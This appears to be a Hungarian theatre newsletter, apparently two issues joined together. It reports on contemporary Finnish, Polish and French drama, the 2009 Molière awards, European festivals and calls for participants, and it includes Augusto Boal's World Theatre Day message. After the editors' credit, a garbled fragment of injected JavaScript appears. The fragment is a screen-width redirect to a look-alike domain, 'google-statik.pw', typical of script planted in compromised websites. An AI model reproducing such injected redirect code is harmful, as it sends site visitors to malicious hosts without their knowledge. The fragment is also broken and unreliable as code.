A hagyomanyokhoz hiven a kortars finn drama 2009-ben is szep szammal kepviselteti magat a finn Nemzeti Szinhaz repertoarjan. Osszel lesz Juha Vakkuri The King's Hands  cimu darabjanak bemutatoja a kisszinpadon, Petteri Sallinen rendezeseben. A belga II. Leopold kiraly udvaraban jatszodo eloadas megmutatja a hasonlosagokat a 19. szazadi gyarmatositas es a modernkori globalis imperializmus kozott. A sved Asa Kalmer vitte szinre Laura Ruohonen legujabb munkajat, a War Tourists cimu sotet farce-ot. A darab azon a tortenelmi tenyen alapul, hogy a Krimi Haboru ideje alatt a 19. szazadban sved tarsasutazasokat szerveztek a Balti-tengerhez, ahol turistalatvanyossag volt, ahogy a brit hajok bombazzak a finn tengerparti varosokat, sot, kulon dijazasert meg a rabokat is etethettek. Maria Kilpi ket generacio kapcsolatarol szolo megindito, minimalista dramaja, a Sore Spot az Omapohja Studioban lathato Minna Nurmelin rendezeseben. A darab a berlini Theatertreffen legjobb kortars uj darabnak jaro dijat nyerte 2007-ben, es meghivast kapott a 2009. augusztusaban megrendezendo Tampere Szinhazi Fesztivalra. Ari-Pekka Lahti legujabb munkajat, a Big Bad World cimu dramat Tuomo Aitta rendezte a Willensauna Szinpadon: het fiatal ferfi kuszkodeserol szol, hogy megtalaljak a helyuket egy egyre inkabb iranyat vesztett vilagban. A nagyszinpadon 2009. februarjaban mutattak be Kari Hotakainen es Juha Lehtola Who's Who cimu, Dosztojevszkijt es Vlagyimir Putyint is felvonultato abszurd szatirajat az irigysegrol, onhittsegrol es a bolcsessegre valo sovargasrol. Szinten februar ota lathato Otso Kautto uj darabja, az apak es lanyok kozotti kapcsolat termeszetet vizsgalo It's a Girl! a Willensauna Szinpadon.

 

1.2. Kiosztottak a 2009-es Moliere-dijakat

 

A francia szinhazi elet jelentos esemenyenek szamit a Moliere-dijak odaitelese, amely az elmult szezon legjelentosebb alkotoit es alkotasait ismerik el, kulonbozo kategoriakban.

Ezek kozul csak nehany dijazottat emelunk ki. A TNP/Villeurbanne Shakespeare Coriolanusa Christian Sciaretti rendezeseben a legjobb kozszolgalati szinhazi eloadas dijat kapta, a legjobb fuggetlen tarsulatnak jaro elismerest a Compagnie Faisan L'Oral et Hardi cimu produkciojanak iteltek meg. A maganszinhazak kozott a Petit Montparnasse-ban jatszott Raymond Depardon-Zabou Breitman Des gens (Az emberek) cimu darabja kapta a Moliere-dijat. A legjobb komedianak jaro dij iden a Cochons d'Inde-nek jart, es az Opera de Sarah - avant l'Amerique (Sarah operaja - Amerika elott) reszesult a legjobb musicalnek jaro meltatasban. Ket dramairo reszesul elismeresben. Jean-Claude Grumberg eddigi munkassagaert es a Vers toi Terre Promise - Tragedie dentaire cimu alkotasaert a legjobb elo francia dramaironak jaro elismerest kapta. David Lescot pedig  az uj dramairo-tehetseg kituntetest nyerte el La Commission Centrale de l'Enfance cimu alkotasaert.

1.3. Az uj lengyel drama

Zbiniew Raszewski nevet viselo Lengyel Szinhazi Intezet, amelyet 2003-ban alapitott az ottani kulturalis miniszterium, a kortars dramat bemutato kiadvanyaban a lengyel dramairas legfrissebb iranyzatairol, alkotoirol ad informaciot. Roman Pawlowski tanulmanyaban attekinti a lengyel szinhaz 1980-90-es eveit, amikor nagyon gyors valtozasok mentek vegbe a tarsadalomban, s ekkor kerulhetett szinre a nagy mesterek, Mrozek, Glowacki, Rozewicz, Schaeffer, Slobodzianek szamos darabja.

A dramairo es filmrendezo Marek Koterski-nek a keso 80-as evekben szuletett dramaiban volt eloszor tettenerheto a dramai nyelvezet megvaltozasa. Adam Miauczynski, Koterski darabjainak anti-hosenek mindenfele emelkedett torekvese banalitasokba sullyed. Van nehany romlott foga, egy Fiat 126-osa, egy lakotelepi lakasa Lodzban, amelyen elvalt felesegevel osztozik, s kozben az az ambicio hajtja, hogy nagy rendezo, jelentos iro legyen. Kenyeret azonban a nagyon utalt tanitassal keresi. Bar Koterski darabjainak szemelyes, oneletrajzi indittatasa is van, alapvetoen mely tarsadalmi problemat erintenek: ez az ertelmisegi ethos szetesese. Az elnyomas eveiben a lengyel ertelmisegre kulonos nyomas nehezedett, megpedig a lengyel nemzet politikai es szellemi vezetojekent jatszott szerepet, amelyet a megvaltozott korulmenyek kozott a szellemi elit szinte teljesen elvesztett. Koterski eppen ezt fogalmazza meg alkotasaiban, valamint azt, hogy ezt a reteget hogyan keriti hatalmaba a penz uralma.

Grzegorz Nawrocki, ujsag- es dramairo ahhoz a generaciohoz tartozik, amelyik a nepi demokraciaban nott fel. Muveiben egyaltalan nem a mult fele fordul, hanem az uj realitas kerdesei izgatjak, s ezek kozul is a fiatalok kozti eroszakossag. Az 1995-ben irt Mloda smierc (Korai halal) cimu darabjaban a tizenevesek inditek nelkul elkovetett gyilkossagairol szol, akik nemcsak a rokonaikat gyilkoljak le, hanem a veletlenul utjukba kerulo embereket is. A darab a rendezoket arra osztonozte, hogy elhagyjak a konvencionalis szinhazi tereket, es ott mutassak be, ahol eppen ez a korosztaly szorakozik, peldaul discoban, klubokban. Ez az elso olyan darab, amely elinditja az uj-realista dramat Lengyelorszagban

Ingmar Vilquist felvett nev, es egy muveszettorteneszt rejt. Az 1999-ben indulo dramairo az amerikai es skandinav pszichologiai dramakbol inspiralodott, elsosorban Ibsen, Strindberg, Tennessee Williams darabjaibol. Hosei csak felig megertett Idegenek, akiket mentalis fogyatekossaguk miatt kikozositettek a tarsadalombol. Bar a szerzo folyamatosan atlepi a hatart a valosag es a tortenelemi kontextus kozott, de ez az 1989. utani Lengyelorszagban alapveto kerdes, problema, mivel az idegengyulolet egyre erosodik ebben az orszagban is. A politikai reformok atalakitottak az addig homogennek szamito tarsadalmat individuumok demokratikus kozossegeve, ezert a partvonalra sodrodas is erosodott, a kisebbsegek elorukkoltak, es mindez jelentos konfliktusokat hozott. Noc Helvera c. darabjaban vagy Beztlenowce c. egyfelvonasosaban tolerancia es intolerancia hatarait fogalmazza meg.

A legfiatalabb generacio 2000 tajan jelent meg, s ekkor a dramak hangvetele, stilusa, a dramak bemutatasa radikalisan megvaltozott. Azota szinte minden evben uj nevek bukkannak fel, uj bemutatokat tartanak. A hetvenes, nyolcvanas evekben szuletett muveszek mar a kapitalizmus gyermekei, nagyon kulonbozo tarsadalmi retegbol erkeztek, es szamukra '68 vagy '81 a regmult tortenelmehez tartozik. Muveikben egyaltalan nem fordulnak a mult fele, hanem inkabb a jelen gondjainak megfogalmazasa erdekli oket: a csaladok valsaga, szethullasa, az eroszakhullam fenyegetese, a fogyasztoi tarsadalom es az erzelmi kotelekek lazulasa adjak a dramak temait.  

Szamos, 2000 utan letrejott intezmeny is segiti a fiatal szerzok darabjainak bemutatasat, tobbek kozott az ottani dramafesztival vagy a varsoi Laboratorium Dramatu vagy a Nemzeti Szinhaz felolvasoszinhaza. Mi a kozos az ezeken a helyeken bemutatott dramak kozott? Elsosorban az, hogy kerulik a realista stilust, a konvencionalis formakat, a szimbolizmust, viszont gyakran tamaszkodnak dokumentumokra, s nyelvhasznalatukban sokszor a sokkolas, retegnyelvek jelennek meg. Hoseik vagy gazdasagi vagy moralis okokbol kikozositett emberek: homoszexualisok, hajlektalanok, prostitualtak. Ebbe a csoportba tartozo irok kozul a tanulmany iroja Przemyslaw Wojcieszk, Pawel Sala, Robert Bolesto nevet emeli ki. 2002-2005 kozott Gdanskban a Wybrzeze Szinhaz Pawel Demirski otletet valositotta meg: Fast Urban Theatre cimmel, amely interjukra epulo dokumentarista eloadasok sorozata volt.

A Varsoban mukodo Laboratorium Dramatu elsosorban a neorealista iranyzatu darabokat reszesiti elonyben.

Az uj lengyel drama eltavolodik a hagyomanyos, linearis narraciotol, a jol definialhato hosoktol. Az ebbe a csoportba tartozo dramairok a posztmodern szinhazi elkepzelesekre tamaszkodnak, lazaszovesu, fragmentumokra epulo, befejezetlen, szaggatott dialogusokat irnak. Ezt a technikat elsosorban a varsoi Rzmaitosci Theatre kore csoportosulo irok alkalmazzak, tobbek kozott Szymon Wroblewski, Michal Bajer, Dorota Maslowska.

 

1.4. Marguerite Duras: Az angol szereto

 

Marguerite Duras: Az angol szereto cimu darabjat Marie-Louise Bischofberger rendezeseben mutatta be a Theatre de la Madeleine, parades szereposztasban, a nyolc ev kihagyas utan szinpadra lepo Ludmila Mikael, Ariel Garcia-Valdes es Andre Wilms jatsszak a szerepeket.

Duras mindig is nagy lelkesen olvasta a bunugyi rovatokat, a gyilkossagi hireket, es fokent az erdekelte, mi lehetett az elkovetok inditeka. 1985-ben nemikeppen elvesztette a fejet, amikor Christine Willemint dicsoitette, akit sajat fia meggyilkolasaval gyanusitottak.

Amelie Rabilloux  tortenete volt az inspiracio igazi forrasa. 1949-ben ez a no megolte a ferjet, majd feldarabolta, es a testreszeket kulonbozo helyeken rejtette el. Amikor letartoztattak, azonnal bevallotta tettet. A targyalasrol 1952-ben a Le Monde is beszamolt, s arrol is, hogy az asszony keptelen volt magyarazatot adni arra, miert darabolta fel a ferjet. Duras eloszor regenyt irt ebbol, amely 1967-ben jelent meg. Ezutan szuletett meg a szindarab, amelyet 1976-ban mutattak be Madelaine Renaud, Pierre Dux es Michel Lonsdale foszereplesevel, Claude Regy rendezeseben.

Az eredeti tortenetbol Duras a megmagyarazhatatlan inditeku buntenyt allitja muvei kozeppontjaba. A foszereplono, Claire Lannes nem a ferjet oli meg, hanem siketnema unokahugat, aki vele egy fedel alatt elt, es nem arulja el, hogy hova rejtette el a fejet. Az ot faggato szereplo nem pszichologus, nem ugyesz, nem ugyved, hanem olyan valaki, aki az inditekra kivancsi, azt akarja megerteni. Eloszor a ferjet faggatja, akit egyaltalan nem lep meg a bunteny. Ugy beszel sajat felesegerol, ahogy egy ismeretlenrol szoktak. Elmondja, hogy mindig voltak szeretoi, de feleseget soha nem hagyta el, mellette maradt, mert az asszony soha semmit se kerdezett tole. Mindenkit egy dolog erdekel igazan: mi lett az aldozat fejevel, ez viszont Claire Lannes-t nem izgatja. Hiaba faggatjak, bune megfoghatatlan, erthetetlen marad, s mindez csak azert alakul igy, mert senki sem kepes feltenni neki a „jo" kerdest, amire valaszolni tud.

 

1.5. Theatre Royal Stratford East - rendhagyo program 2012 elso evadara

A Theatre Royal Stratford East 2012. januarjatol 6 honapig a kozonsegre bizza musoranak kialakitasat a londoni Olimpia elott. Eloszor fordul elo a rendhagyo eset, hogy egy komoly londoni koszinhaz szabad kezet ad a publikumnak egy teljes evad musortervenek meghatarozasaban, beleertve a harom vagy negy bemutatando darab es a nekik szant helyszin kivalasztasat. A Stratford East muveszeti vezetoje, Kerry Michael ijesztonek, de izgalmasnak talalja a kezdemenyezest, aminek nagy szerepe lehet mind muveszeti szempontbol, mind a kozonsegformalas es marketing teruleten. 

 

 

1.6. Almeida Nyari Szinhazi Fesztival 2009

 

A londoni Almeida bejelentette 2009-es, julius 8-tol augusztus 1-ig tarto nyari fesztivalprogramjat. A hires szinhaz negy elvonalbeli tarsulatot hivott meg a vilag minden tajarol (Yorkshire-tol New Yorkig), hogy megismerhessuk a legfrissebb ujito szinhazi torekveseket. Julius 8. es 12. kozott tekintheto meg a Last Seen a Slung Low eloadasaban, amit az a teny ihletett, hogy evente mintegy 200.000 ember tunik el nyomtalanul. Julius 16-tol 19-ig kerul sor a TEAM The American Capitalism Projectjere, majd a GULP Or Nearest Offerjere, ahol minden elado. Agyak, mobilok, almok es csecsemok. Elado, elkelt. Az eloadas arra keresi a valaszt, mi tortenik akkor, ha mindenunket eladtuk. Julius 29. es augusztus 1. kozott lathato a Tiata Fahodzi, egy londoni allami korhaz kortermeiben jatszodo zimbabwei thriller.

 

 

1.7. Duisburg - 32. Duisburgi Akcentusok Fesztivalja

Duisburgban rendeztek meg 2009. aprilis 24. es majus 10. kozott a 32. Duisburgi Akcentusok Fesztivaljat (Duisburger Akzente), ami a kortars torok szinhaz, tanc, zene, irodalom es kepzomuveszet kiemelkedo eredmenyeit hozza el Nemetorszagba. A nyolcvannal is tobb programot felvonultato kulturalis esemenyt Yesim Ozsoy es Genco Gula Surname 09 cimu szabadteri performanszaval nyitottak meg a duisburgi Konig-Heinrich-Platzon. A szinhazi talalkozon kilenc nemet es torok szinhazi produkcio vesz reszt, koztuk a Munich Kammerspiele Schnee (Ho) cimu eloadasa, ami Orphan Pamuk azonos cimu regenyen alapul. A musorban szinten szerepel a Sivas 93 Genco Erkal rendezeseben. A darab az 1993-as tragedia dokumentarista feldolgozasa, amikor az anatoliai Sivas varosaban 37 ember bent egett egy hotelben, mikozben vallasi fanatikusok egy kulturalis fesztival ellen tuntettek.

 

1.8. A Theatre national de la Colline 2009/2010-es szezonja

 

A 45 eves Stephane Braunschweig, a Theatre de la Colline uj igazgatoja majus 11-en ismertette a kovetkezo szezon programjat. Az igazgato-rendezo korabban nagyon sikeresen iranyitotta a Theatre national de Strasbourg-ot. Braunschweig mar korabban is sokszor rendezett ebben a legfiatalabbnak szamito nemzeti szinhazban, amelynek arculatat ket elodje, Jorge Lavelli es Alain Francon alakitotta ki, es tette a kortars szinhaz otthonava. Az uj igazgato folytatni kivanja az o munkajukat, bar Alain Franconhoz kepest o a hangsulyt nem elsosorban a dramairok, dramak felfedezesere helyezi, hanem a rendezesre, pontosabban a rendezes es az dramak szimbiozisara. Ennek jegyeben hivta meg Sylvain Creuzevault tarsulatat. A 2009-2010-es szezont a „hosiesseg es a radikalitas alma" tema kore szervezi. Ezt azert tartja fontosnak, mert igy akarja vilagossa tenni a kozonseg szamara, hogy milyen tipusu szinhazat akar csinalni, hogy a nezo tudja, mire szamithat. Braunschweig a radikalitas ertelmezese, elemzese jegyeben ket Ibsen darabot rendez, a Babahazat es a Rosmersholmot. Minden szezonban meghiv egy kulfoldi rendezot, akitol bemutat egy, a sajat orszagaban rendezett eloadast, es felkeri, hogy francia szineszekkel mutasson be egy darabot. Az elso szezonban a vendeg a nemet Michael Thalheimer lesz.

 

 

1.9. Premieres Fesztival Strasbourgban

 

A Theatre National Strasbourg es a Maillon Szinhaz otodik alkalommal szervezi meg  a fiatal europai rendezok fesztivaljat, amelyen negy napon keresztul 2009. junius elejen 8 orszagbol tiz eloadast mutatnak be. Nemetorszagbol, Bulgariabol, Franciaorszagbol, Nagy-Britanniabol, Olaszorszagbol, Romaniabol, Szerbiabol es Svajcbol latnak vendegul produkciokat.

A 2004-ben alakult olasz Compagnie Muta Imago (a+b)3 cimu eloadas egy szorakozni vagyo, gondtalan par izgatott keszulodesenek bemutatasaval indul, de eletuket a haboru megvaltoztatja, es a jol felepitett optimizmusuknak vege szakad. Kimondatlan, elharapott szavaikkal tonkreteszik intim kapcsolatukat. A minimalista eloadas egy emberi kapcsolat es a tortenelem viszonyat kivanja feldolgozni.

Dobromir Tzvetkov fiatal bolgar rendezo, aki 2008-ban vegzett a szofiai szinmuveszetin. Buchner: Danton halala cimu darabjat dolgozta at es rendezte meg. Az eredeti mubol csak az alapszereploket tartotta meg : Desmoulins, Robespierre, Saint-Just es termeszetesen Danton figurajat.

Roman-francia koprodukcioban jott letre a roman, de a TNS iskolajaban vegzett Elena Castelian eloadasa, a Transit, amely egyfelol a Ceausescu par « pererol » es kivegzeserol szol, pontosabban a kollektiv es szemelyes emlekezet konfrontaciojarol. A jatekter ket reszbol : egy tanterembol, amely a gyerekkori elmenyek szintere es a « per » szinterebol all.

Boris Vian :Tajtekos napok cimu muvet a nemet Alexander Riemenschneider adaptalta es rendezte. Az 1981-ben szuletett muvesz zenei es irodalmi tanulmanyokat folytatott, mielott a Theaterakademie Hamburg rendezoi szakara iratkozott be.  A fesztivalon lathato eloadasat is a hamburgi szinmuveszetin mutatta be.

Szerb-holland koprodukcio Sanja Mitrovic eloadasa, a Will you be ever happy again? , amely a gyerekkori emlekekre epul es arra keres valaszt, hogy milyen lehet az egyen kapcsolata  nemzete tortenelmevel, amellyel nem ohajt azonosulni, mi a viszonya az egyennek a kollektiv identitashoz.

Nagy-Britanniat az  ?lysteri Ubsberg Brager es Philip Thorne-rendezte ket Heiner Muller darab eloadasa kepviseli, Franciaorszagot pedig a TNS novendekekent vegzett Matthieu Roy szerelmi viszonyokat bemutato eloadasa. Egy masik francia produkcioban Pessoa nyoman keszult adaptacio L'Etranger (Idegen) cimmel kerul bemutatasra Pierre Talleron  rendezeseben.

 

2. Kortars drama

 

2.1. 2009-es Moliere-dijazottak darabjai

 

Jean-Claude Grumberg 1939-ben szuletett Parizsban. Tobb mint husz szindarab szerzoje, az utobbi nehany evben egyre tobb gyerekeknek szolo szinmuvet irt, Le Petit Violon /1995/, Marie des grenouilles /2003/, Iq et Ox /2003/, Le Petit Chaperon Uf /2004/, Mange ta main /2004/, Pinok et Barbie /2005/.

 

Vers toi Terre Promis - Tragedie dentaire (Utban az Igeret Foldje fele - fogaszati tragedia)

 

Szereplok: 4 no, 2 ferfi

 

Egy kisfiu narrator emlekezik vissza arra az idore, amikor edesanyja a masodik vilaghaboru utan gyakran vitte fogorvoshoz ot. Fajdalomra fajdalom a valasz. A fogorvos es felesege, Charles es Clara Spodek epphogy tuleltek a masodik vilaghaborut, de ket lanyuk elvesztese merhetetlen, megemeszthetetlen fajdalommal tolti el oket. A gorog tragediakbol ismert korus vezeti be a nezoket Spodek doktor rendelojenek intimitasaba. A narrator szerepet egy kisfiu tolti be, aki feleleveniti a fogorvosi rendeloben latottak emlekeit, es igy osszekoti a jelent es a multat.

A darab a masodik vilaghaboru nepirtasa utan szeteso csaladrol szol, az ujrakezdes fajdalmarol, a felejteni keptelen emberekrol, sok erzelemmel es gyenged humorral. A darabot Charles Tordjman rendezte Aix-en-Provence-ban 2008. novembereben, majd ezt kovetoen az eloadas Nancyban, Montpellier-ben, Parizsban, Tel Avive-ban turnezott.

 

 

David Lescot (1971) dramairo, rendezo, zenesz. Szamos szinpadi zenet alkot, tobbek kozott Anne Torres szamara. Elso darabjat 1998-ban irta. A Theatre de la Ville-ben (Parizs maga rendezte  Un homme en faillite (Becsodolt pasas) c. darabjat. A 'Europeenne (eu) cimu muveert 2008-ban az SACD fiatal dramairo tehetsegnek jaro dijat valamint a Dramairodalom nagydijat kapta meg. A darabot az Uj Szinhaz megbizasabol Bognar Robert forditotta le.

A fiatal dramairo tehetsegnek jaro Moliere-dijat La Commission Central de l'Enfance ert nyerte el.

 

La Commission Central de l'Enfance

 

A szerzo a kovetkezoket irja darabjarol: „Gyerekkent a nyari vakaciokat a francia kommunista zsidok altal alapitott Commission Centrale de l'Enfance taboraban toltottem.  Ez a szervezet eredetileg a masodik vilaghaboruban eltunt gyerekek megsegitesere jott letre, es egeszen 1980-ig mukodott. Apam is ide jart. Erre akartam visszaemlekezni, minden nosztalgia nelkul, es tortenet-toredekek segitsegevel feleleveniteni ezt a tortenetet, amelyben neha zavarosan, neha tudattalanul jelen volt a politikai lelkiismeret, tudatossag, a remennyel valo visszaeles, a szigoru szabalyok, a mindenek folotti ideologia,  az erzekek ebredesenek gondja, baja. Ezekbol alkottam egyfajta epikus, ritmizalt, enekelt poemat... Igy szuletett meg ez a minimalista „cabaret", egy hangra, de amely tobb hangot, tortenetet olvaszt magaba."

 

 

3. ITI  Figyelo: Felhivas, palyazat, informacio

 

3.1.  Baltic Circle Fesztival - felhivas

 

A 2009. november 18. es 22. kozott megrendezendo 6. Baltic Circle Fesztival Mobile Lab professzionalis resztvevoket keres az irok csapataba. A szovegek a Baltic Circle DramAgora nethirleveleben jelennek majd meg. A sikeres palyazok szallast kapnak, es ingyenesen vehetnek reszt a szinhaz minden programjan.

Elvarasok:

  • Magas szakmai szinvonal
  • Min. 2 szoveg a fesztivalprogramrol angol nyelven
  • A fesztival alatt publikalhato, kesz szovegek
  • 2009. oktober 15-ig project leiras

 

Jelentkezes: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

                     This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

3.2.  Marrakesh - Nemzetkozi Szinhazi Fesztival

 

2009. november 3. es 7. kozott rendezik meg Marrakesh-ben a 3. Nemzetkozi Szinhazi Fesztivalt. Ebben az evben olyan szinhazak, tarsulatok, tancosok, tanctarsulatok jelentkezeset varjak, akik a szinhazi falakon kivul, koztereken, nyilvanos helyeken, utcan valositjak meg az eloadasukat, es uj tipusu kapcsolatok teremtesere torekednek a kozonseggel. A palyazni kivano produkciok DVD-jet 2009. junius 30-ig kell bekuldeni.

 

Tovabbi informacio: www.theatreacadema.sitemaroc.com

 

3.3. Nemet tarsulat improvizacios tancosokat keres

   
 A nemet Hebbel am Ufer tarsulat tancosokat keres a 2009. augusztusaban a berlini Tancfesztivalon bemutatando eloadasahoz. (Dance Europe Magazine)
A berlini Hebbel am Ufer tarsulat 25 tancost keres a "Testek a varosi terekben" (Bodies in Urban Spaces) cimu, Willi Dorner koreografiajaval szinpadra kerulo eloadashoz. A sikeres palyazok tapasztaltak a paros improvizacios mozgasmuveszet teren, es jo akrobatikus erzekkel rendelkeznek. Az eloadast 2009. augusztus 21-en es 22-en mutatjak be a berlini Tancfesztivalon. A felveteli probatancot 2009. junius 16-an tartjak a nemet fovarosban, a probakat 2009. augusztus 14. es 20. kozott rendezik.

Bovebb informacio:

Hebbel am Ufer; Stresemannstr. 29, 10963 Berlin, Deutschland - Anna Wagner

E-mail: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Telefon: +49 30 25 90 04 75

     

3.4. Felhivas - SPIELART Fesztival Munchen

A muncheni SPIELART Fesztivalt 2009. november 19. es december 5. kozott rendezik. 6 fo jelentkezeset varjak, akik csatlakoznak a Mobile Lab csapathoz november 26. es 29. kozott. A cikkek a www.spielart.org weboldalon fognak megjelenni. A fesztival valamennyi eloadasara es programjara ingyen belepest, valamint 3-4 napi szallast biztositanak.

Elvarasok:

  • magas szintu szakmai hozzaallas
  • Min. 2 szoveg
  • Egy eloadas utani vita moderalasa

Tovabbi informacio: This e-mail address is being protected from spambots. You need JavaScript enabled to view it

 

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2009. február

SZINHAZI VILAGNAPI UZENET

1. Hirek

1.1. Odeon-Theatre de l'Europe Szinhaz- Howard Barker sorozatot indit

1.2. National Theatre London - Helen Mirren - Phaedra

1.3. Theatre503 - Tavaszi evad

1.4. Chichester Fesztival 2009

1.5. Theatre Mania 1 - Linz

1.6. Gate Theatre, London: Generation Gate

1.7. Nemzetkozi elismeres Schilling Arpadnak

2. Kortars drama

2.1. Gillian Plowman: The Window cleaner (Az ablaktisztito)

2.2 Sebastien Thiery: Cochon d'Inde

3. Felhivas, palyazat, informacio

3.1. „Teatro del Mundo en Argentina 2009"

SZINHAZI VILAGNAPI UZENET

Szinhazi vilagnapi uzenet 2009.

Szinhazi vilagnapi uzenet 2009.

Augusto Boal irasa:

Kulonosek az emberi tarsadalmak mindennapjai, de bizonyos alkalmakkor megis szinhazi eloadasokra van szuksegunk. Ezek fontos tarsasagi esemenyek, olyanok, mint amilyenre most eljottek.

Nem tudatosul bennunk, de az emberi kapcsolatok szinhazi mintakat kovetnek: a ter hasznalata, a testbeszed, a szavak megvalasztasa, a hanghordozas, a gondolatok es erzelmek utkozese, vagyis mindaz, amit a szinhazban bemutatunk, es sajat eletunkben is megelunk, azt sugallja: a szinhaz teremtett minket!

A menyegzok, a temetesek spektakulumok, de egyben a mindennapi elet jol ismert ritusai is. A ceremoniak, a reggeli kavezasok, a koszonesek, a batortalan szerelmek es a viharos szenvedelyek, a szenatorok tanacskozasa, diplomatak talalkozoja, ez mind szinhaz.

Muveszetunk arra tanit, hogy nyitottan fogadjuk be a mindennapi elet eloadasait, melyekben egyforman vagyunk szineszek es nezok, s elmosodik a szinpad meg a zsollye kozti hatar. Valamennyien muveszek vagyunk: a szinhaz arra tanit, hogy meglassuk azt, ami nyilvanvalo, de mar annyira hozzaszoktunk, hogy eszre sem vesszuk. A megszokott lathatatlanna valik, es epp azert hozunk letre eloadasokat, hogy megvilagitsuk mindennapi eletunk szinpadat.

Mult ev szeptembereben egy varatlan „szinhazi meglepetes" csapott le rank: azt kepzeltuk, hogy biztonsagos vilagban elunk, es bar tavoli, vad tajakon haboruk, nepirtasok, verengzesek tombolnak, embereket kinoznak, mi biztonsagban elunk, penzunket tekintelyes bankokban helyeztuk el, vagy becsuletes brokerre biztuk; aztan azt akartak elhitetni velunk, hogy ez a penz nem is letezett, hogy csak nehany, egyaltalan nem virtualis, de nem is megbizhato vagy tiszteletremelto kozgazdasz siralmas, virtualis agyszulemenye volt. Ez rossz szinhaz, sotet cselszoves, amelyben nehanyan sokat nyertek, es sokan mindent elvesztettek. A gazdag orszagok politikusai titkos megbeszeleseket tartottak, es csodatevo megoldasokkal alltak elo. Mi, a nezok, az aldozatok, az erkely utolso soraiba szorultunk.

Husz evvel ezelott Racine: Phedrajat rendeztem Rio de Janeiroban. A diszlet szegenyes volt: a foldon ket tehenbor, korulotte bambuszrudak. Minden eloadas elott a kovetkezoket mondtam a szineszeimnek: „Vege a probaknak, annak, hogy naprol napra ujabb variaciokat probaljunk ki. Amikor atlepitek a bambuszkeritest, kozuletek senki sem hazudhat tobbe. A szinhaz az elrejtett igazsag maga."

Amikor a felszin moge nezunk: mindenutt elnyomokat es elnyomottakat, osztalyokat es kasztokat latunk, egy igazsagtalan, kegyetlen vilagot talalunk. A mi dolgunk, hogy egy masfajta tarsadalmat kepzeljunk el. Meggyozodesunk, hogy ez lehetseges. A mi dolgunk hat, hogy ezt a szinpad deszkain es az eletben megvalositsuk.

Nezzek meg az eloadast, es amikor hazaternek, jatsszak el a sajat darabjukat, es vegyek eszre azt, ami kiboki a szemuk, de soha nem lattak meg. A szinhaz nem esemeny, hanem eletmod!

Mindannyian szineszek vagyunk: allampolgarnak lenni annyit jelent, hogy nem elegszunk meg azzal, hogy tarsadalomban elunk, hanem megvaltoztatjuk azt.

Augusto Boal

Augusto Boal brazil dramairo, rendezo, elmeleti szakember. Rio de Janeiroban szuletett 1931-ben. Az Elnyomott Szinhaz elmeletenek megalapitoja. Szamos elismeresben, kituntetesben reszesult. 1956 es 1971 kozott Sao Pauloban a Teatro ARENA igazgatoja volt. Ennek a szinhaznak a letrehozasa jelentosen megvaltoztatta a braziliai szinhazi eletet, szinhazi modellt. Celjuk egy nepszinhaz megvalositasa volt. Elsosorban kortars brazil szerzok muveit allitottak szinpadra, de a nagy klasszikus vilagszinhazi repertoart is szinre vittek, tobbek kozott Moliere, Ruzzante, Lope de Vega, Brecht stb. dramait. Kesobb zenes darabokat is jatszottak, de kiserleteztek uj mufajjal is. Letrehoztak az ugynevezett Szinhaz-naplot, es ebbol nott ki a Theatre de l'Oprime (az Elnyomott Szinhaza).

1964-ben az elso katonai puccs mindent megkerdojelezett, bevezettek a cenzurat. 1968-ban a masodik allamcsiny pedig veget vetett mindenfele nepszinhazi kezdemenyezesnek. Diktatura vette kezdetet az orszagban. Az ARENA Szinhaz elkotelezett, a diktatura ellen harcolo szinhazza valt. 1971-ben Augusto Boalt letartoztattak, megkinoztak, es ezutan szamuzetesbe kenyszerult. Ekkor dolgozta ki az „Elnyomott szinhaza" elmeletet. 1979-ben Parizsban telepedett le, de kozben rendezett Nemetorszagban es Ausztriaban is. 1986-ban Brazilia ujra befogadta Augusto Boalt, akit Rio varosanak kepviseloi testuletebe valasztottak. Jelenleg a Centro do Teatro do Oprimado do Rio de Janeiro munkajat iranyitja.

1. Hirek

1.1. Odeon-Theatre de l'Europe Szinhaz- Howard Barker sorozatot indit

Howard Barker neve nem ismeretlen Magyarorszagon. Jelenetek egy kivegzesbol cimu muvet tobb szinhazban is jatszottak, es neve meg tobbszor elokerult Sarah Kane eletrajzaban, amikor megemlitik rola, hogy jatszott Baker egyik darabjaban. Ezen kivul semmi! Pedig az 1946-ban Dulwichben szuletett szerzo rengeteget irt, szindarabokat, forgatokonyveket, esszeket. Elso darabjat a Royal Court Theatre Upstrairs mutatta be 1970-ben nagy sikerrel, amely hatasara a Royal Court, a Royal Shakespeare Company, The Open Space Theatre, a Sheffield Crucible es az Almeida jatszotta szinmuveit. Szamos bab-darab es operalibretto szerzoje, valamint kolto es esszeiro is.

Barker a maga szamara dolgozta ki a „katasztrofa szinhaz" terminusat. Darabjaiban gyakran az eroszak, a szexualitas, a hatalmi vagy temajat dolgozza fel. Szerinte a tragedia megszabaditja a nyelvet a banalitasoktol. Gyakran meriti temait a tortenelembol, ahogy ezt a Jelenetek egy kivegzesbol eseteben is tette. Vagy eppen hires irodalmi, filozofiai alkotasokbol inspiralodik. Darabjai java resze moralis ertekek es nyelvi kodok szetesesen alapul, megis koltoiseg hatja at ezeket. Szerinte a szinhaz funkcioja eppen az, hogy megadja a kozonsegnek a moralis erveles felelosseget.

Azota, hogy Olivier Py igazgatja (2007. marcius) Parizsban az Odeon-Theatre de l'Europe Szinhazat, az a cel vezerli, hogy programjaval az europai identitast fogalmazza meg, mutassa be. Ennek jegyeben tuzi a szinhaz musorra Howard Barker negy darabjat 2009. elejen, kulonbozo rendezok szinreviteleben, valamint tartanak felolvasasokat a brit szerzo alkotasaibol.

1.2. National Theatre London - Helen Mirren - Phaedra

